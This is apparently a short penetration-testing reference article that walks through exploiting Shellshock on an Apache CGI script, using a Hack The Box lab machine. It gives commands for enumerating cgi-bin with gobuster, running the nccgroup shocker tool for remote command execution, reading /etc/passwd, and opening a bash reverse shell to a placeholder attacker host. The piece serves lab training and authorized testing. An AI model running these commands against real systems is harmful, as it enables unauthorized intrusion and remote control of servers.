Shellshock Exploitation
This is my second article in the "Field Reference" series. The following's intended use is to be quickly reviewed during pentesting engagements, meaning most simple subjects will not be elaborated on due to unpredictable variables in each machine's environment.
Contents:
Requirements
- Host is running an Apache Server
- A reachable script is located in /cgi-bin
- The script is client-executable.
The Setup
Locate the executable cgi script on the remote server. This may be a file with an extension of .sh, .cgi, .cg, .py, or .pl extension. Enumerate .cgi first, then .sh if time is constrained. While working on Hack The Box's Shocker machine, I found the shell script by brute forcing hidden scripts using gobuster:
gobuster dir -u 10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 -x .cgi,.shClone the following github repository to your local working directory:
git clone https://github.com/nccgroup/shocker.gitExploitation
Run the shocker.py script with two arguments: the remote host and the cgi script to abuse.
./shocker.py --Host 10.10.10.56 -c /cgi-bin/user.shYou should now have a limited shell for remote command execution. There are things to keep in mind when executing commands on the server. You must use the full path for command execution (i.e, /bin/cat /etc/passwd). Lastly, you are using a non-interactive shell, so the next best step would be to leverage your RCE into an interactive reverse shell:
/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1